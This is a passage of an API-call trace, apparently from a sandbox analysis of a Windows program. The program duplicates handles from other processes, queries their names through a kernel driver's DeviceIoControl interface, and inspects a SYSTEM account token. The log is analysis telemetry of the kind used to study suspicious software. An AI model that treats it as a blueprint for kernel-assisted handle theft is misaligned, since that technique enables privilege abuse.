ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.494] ObfDereferenceObject (Object=0xffffe0006a01b5f0) returned 0xffff [0288.494] IoCompleteRequest () returned 0x0 [0288.494] CloseHandle (hObject=0x184) returned 1 [0288.494] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.494] GetCurrentProcess () returned 0xffffffffffffffff [0288.494] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0xb0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.494] CloseHandle (hObject=0x184) returned 1 [0288.494] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.494] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.494] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x42, lpOverlapped=0x0) returned 1 [0288.495] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.495] PsAcquireProcessExitSynchronization () returned 0x0 [0288.495] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.495] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffc00148060130, HandleInformation=0x0) returned 0x0 [0288.495] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.495] PsReleaseProcessExitSynchronization () returned 0x2 [0288.495] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27fff [0288.495] ObQueryNameString (in: Object=0xffffc00148060130, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.495] ObfDereferenceObject (Object=0xffffc00148060130) returned 0x15ea12 [0288.495] IoCompleteRequest () returned 0x0 [0288.495] CloseHandle (hObject=0x188) returned 1 [0288.495] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0288.495] GetCurrentProcess () returned 0xffffffffffffffff [0288.495] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x88, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.495] CloseHandle (hObject=0x188) returned 1 [0288.495] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.495] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.495] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x5e, lpOverlapped=0x0) returned 1 [0288.495] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.495] PsAcquireProcessExitSynchronization () returned 0x0 [0288.495] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.495] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067e544b0, HandleInformation=0x0) returned 0x0 [0288.495] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.495] PsReleaseProcessExitSynchronization () returned 0x2 [0288.495] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ffd [0288.495] ObQueryNameString (in: Object=0xffffe00067e544b0, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.495] ObfDereferenceObject (Object=0xffffe00067e544b0) returned 0x217d33 [0288.495] IoCompleteRequest () returned 0x0 [0288.495] CloseHandle (hObject=0x184) returned 1 [0288.495] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x834) returned 0x184 [0288.495] GetCurrentProcess () returned 0xffffffffffffffff [0288.495] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x84, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.495] CloseHandle (hObject=0x184) returned 1 [0288.495] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.495] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.495] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x1a, lpOverlapped=0x0) returned 1 [0288.495] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.495] PsAcquireProcessExitSynchronization () returned 0x0 [0288.495] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0288.496] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069711840, HandleInformation=0x0) returned 0x0 [0288.496] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.496] PsReleaseProcessExitSynchronization () returned 0x2 [0288.496] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ffb [0288.496] ObQueryNameString (in: Object=0xffffe00069711840, ObjectNameInfo=0xffffe0006913a404, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006913a404, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.496] ObfDereferenceObject (Object=0xffffe00069711840) returned 0x15fdec [0288.496] IoCompleteRequest () returned 0x0 [0288.544] CloseHandle (hObject=0x188) returned 1 [0288.544] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xde8) returned 0x188 [0288.544] GetCurrentProcess () returned 0xffffffffffffffff [0288.544] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x0) returned 0 [0288.544] CloseHandle (hObject=0x188) returned 1 [0288.544] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335004c, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x266f70, nOutBufferSize=0x88, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x266f70, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0288.544] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf3d8 | out: Process=0xffffd000ac0cf3d8) returned 0x0 [0288.544] PsAcquireProcessExitSynchronization () returned 0x0 [0288.544] KeStackAttachProcess (in: PROCESS=0xffffe0006a327840, ApcState=0xffffd000ac0cf3f8 | out: PROCESS=0xffffe0006a327840, ApcState=0xffffd000ac0cf3f8) [0288.544] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf3e0, HandleInformation=0x0 | out: Object=0xffffd000ac0cf3e0*=0x0, HandleInformation=0x0) returned 0xc0000008 [0288.544] PsReleaseProcessExitSynchronization () returned 0x2 [0288.544] ObfDereferenceObject (Object=0xffffe0006a327840) returned 0x2fff7 [0288.544] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf3f8) [0288.544] IoCompleteRequest () returned 0x0 [0288.544] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x280320, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0288.544] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.544] PsAcquireProcessExitSynchronization () returned 0x0 [0288.544] KeStackAttachProcess (in: PROCESS=0xffffe0006a327840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a327840, ApcState=0xffffd000ac0cf400) [0288.544] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0288.544] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.544] PsReleaseProcessExitSynchronization () returned 0x2 [0288.544] ObfDereferenceObject (Object=0xffffe0006a327840) returned 0x2fff6 [0288.544] IoCompleteRequest () returned 0x0 [0288.544] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x96c) returned 0x188 [0288.544] GetCurrentProcess () returned 0xffffffffffffffff [0288.544] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0xe4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.544] CloseHandle (hObject=0x188) returned 1 [0288.544] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.544] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.544] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x280320, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0288.544] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.544] PsAcquireProcessExitSynchronization () returned 0x0 [0288.544] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0288.544] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693678a0, HandleInformation=0x0) returned 0x0 [0288.545] ObfDereferenceObject (Object=0xffffe000693678a0) returned 0xfffe [0288.545] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.545] PsReleaseProcessExitSynchronization () returned 0x2 [0288.545] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x27ff0 [0288.545] IoCompleteRequest () returned 0x0 [0288.545] CloseHandle (hObject=0x184) returned 1 [0288.545] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x904) returned 0x184 [0288.545] GetCurrentProcess () returned 0xffffffffffffffff [0288.545] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x178, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.545] CloseHandle (hObject=0x184) returned 1 [0288.545] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.545] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.545] NtQueryInformationProcess (in: ProcessHandle=0x188, ProcessInformationClass=0x0, ProcessInformation=0x14d538, ProcessInformationLength=0x30, ReturnLength=0x14d4b0 | out: ProcessInformation=0x14d538, ReturnLength=0x14d4b0) returned 0xc0000022 [0288.545] CloseHandle (hObject=0x188) returned 1 [0288.545] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x998) returned 0x188 [0288.545] GetCurrentProcess () returned 0xffffffffffffffff [0288.545] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x254, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x184) returned 1 [0288.545] CloseHandle (hObject=0x188) returned 1 [0288.545] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.545] NtQueryObject (in: Handle=0x184, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.545] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x280320, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x280320*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.545] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.545] PsAcquireProcessExitSynchronization () returned 0x0 [0288.545] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0288.545] ObReferenceObjectByHandle (in: Handle=0x254, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a291bb0, HandleInformation=0x0) returned 0x0 [0288.545] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.545] PsReleaseProcessExitSynchronization () returned 0x2 [0288.545] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x28014 [0288.545] ObQueryNameString (in: Object=0xffffe0006a291bb0, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.545] ObfDereferenceObject (Object=0xffffe0006a291bb0) returned 0xfffc [0288.545] IoCompleteRequest () returned 0x0 [0288.545] CloseHandle (hObject=0x184) returned 1 [0288.545] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x998) returned 0x184 [0288.545] GetCurrentProcess () returned 0xffffffffffffffff [0288.545] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x238, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.545] CloseHandle (hObject=0x184) returned 1 [0288.545] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.546] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.546] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x998) returned 0x184 [0288.546] GetCurrentProcess () returned 0xffffffffffffffff [0288.546] DuplicateHandle (in: hSourceProcessHandle=0x184, hSourceHandle=0x238, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x8, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x18c) returned 1 [0288.546] CloseHandle (hObject=0x184) returned 1 [0288.546] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14dbc0, TokenInformationLength=0x800, ReturnLength=0x14d4b4 | out: TokenInformation=0x14dbc0, ReturnLength=0x14d4b4) returned 1 [0288.546] LookupAccountSidW (in: lpSystemName="", Sid=0x14dbd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14d9b0, cchName=0x14d4bc, ReferencedDomainName=0x14d7a0, cchReferencedDomainName=0x14d4b8, peUse=0x14d4e8 | out: Name="SYSTEM", cchName=0x14d4bc, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14d4b8, peUse=0x14d4e8) returned 1 [0288.548] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0xa, TokenInformation=0x14d568, TokenInformationLength=0x38, ReturnLength=0x14d4b4 | out: TokenInformation=0x14d568, ReturnLength=0x14d4b4) returned 1 [0288.548] GetLastError () returned 0x57 [0288.548] SetLastError (dwErrCode=0x57) [0288.548] GetLastError () returned 0x57 [0288.548] SetLastError (dwErrCode=0x57) [0288.548] CloseHandle (hObject=0x18c) returned 1 [0288.548] CloseHandle (hObject=0x188) returned 1 [0288.548] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x998) returned 0x188 [0288.548] GetCurrentProcess () returned 0xffffffffffffffff [0288.548] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x18c) returned 1 [0288.548] CloseHandle (hObject=0x188) returned 1 [0288.548] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.548] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.548] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.548] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.548] PsAcquireProcessExitSynchronization () returned 0x0 [0288.548] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0288.548] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a508610, HandleInformation=0x0) returned 0x0 [0288.548] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.548] PsReleaseProcessExitSynchronization () returned 0x2 [0288.549] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x28010 [0288.549] ObQueryNameString (in: Object=0xffffe0006a508610, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.549] ObfDereferenceObject (Object=0xffffe0006a508610) returned 0xfffe [0288.549] IoCompleteRequest () returned 0x0 [0288.549] CloseHandle (hObject=0x18c) returned 1 [0288.549] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x998) returned 0x18c [0288.549] GetCurrentProcess () returned 0xffffffffffffffff [0288.549] DuplicateHandle (in: hSourceProcessHandle=0x18c, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.549] CloseHandle (hObject=0x18c) returned 1 [0288.549] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.549] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.549] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.549] PsLookupProcessByProcessId (in: ProcessId=0x998, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.549] PsAcquireProcessExitSynchronization () returned 0x0 [0288.549] KeStackAttachProcess (in: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a3e8840, ApcState=0xffffd000ac0cf400) [0288.549] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a27b900, HandleInformation=0x0) returned 0x0 [0288.549] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.549] PsReleaseProcessExitSynchronization () returned 0x2 [0288.549] ObfDereferenceObject (Object=0xffffe0006a3e8840) returned 0x2800e [0288.549] ObQueryNameString (in: Object=0xffffe0006a27b900, ObjectNameInfo=0xffffe000694407c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000694407c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.549] ObfDereferenceObject (Object=0xffffe0006a27b900) returned 0xffff [0288.549] IoCompleteRequest () returned 0x0 [0288.549] CloseHandle (hObject=0x188) returned 1 [0288.549] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x9b0) returned 0x188 [0288.549] GetCurrentProcess () returned 0xffffffffffffffff [0288.549] DuplicateHandle (in: hSourceProcessHandle=0x188, hSourceHandle=0x8a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x18c) returned 1 [0288.549] CloseHandle (hObject=0x188) returned 1 [0288.549] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.549] NtQueryObject (in: Handle=0x18c, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.549] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x2810f0*, lpBytesReturned=0x14d450*=0x8, lpOverlapped=0x0) returned 1 [0288.549] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0288.549] PsAcquireProcessExitSynchronization () returned 0x0 [0288.549] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0288.549] ObReferenceObjectByHandle (in: Handle=0x8a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a3b510, HandleInformation=0x0) returned 0x0 [0288.549] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0288.550] PsReleaseProcessExitSynchronization () returned 0x2 [0288.550] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481b0 [0288.550] ObQueryNameString (in: Object=0xffffe00069a3b510, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0288.550] ObfDereferenceObject (Object=0xffffe00069a3b510) returned 0xfff8 [0288.550] IoCompleteRequest () returned 0x0 [0288.550] CloseHandle (hObject=0x18c) returned 1 [0288.550] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x7c8) returned 0x18c [0288.550] GetCurrentProcess () returned 0xffffffffffffffff [0288.550] DuplicateHandle (in: hSourceProcessHandle=0x18c, hSourceHandle=0x5f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x14d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x14d470*=0x188) returned 1 [0288.550] CloseHandle (hObject=0x18c) returned 1 [0288.550] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x14d4b0 | out: ObjectInformation=0x0, ReturnLength=0x14d4b0) returned 0xc0000004 [0288.550] NtQueryObject (in: Handle=0x188, ObjectInformationClass=0x2, ObjectInformation=0x266f70, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x266f70, ReturnLength=0x0) returned 0x0 [0288.550] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2810f0, nOutBufferSize=0x808, 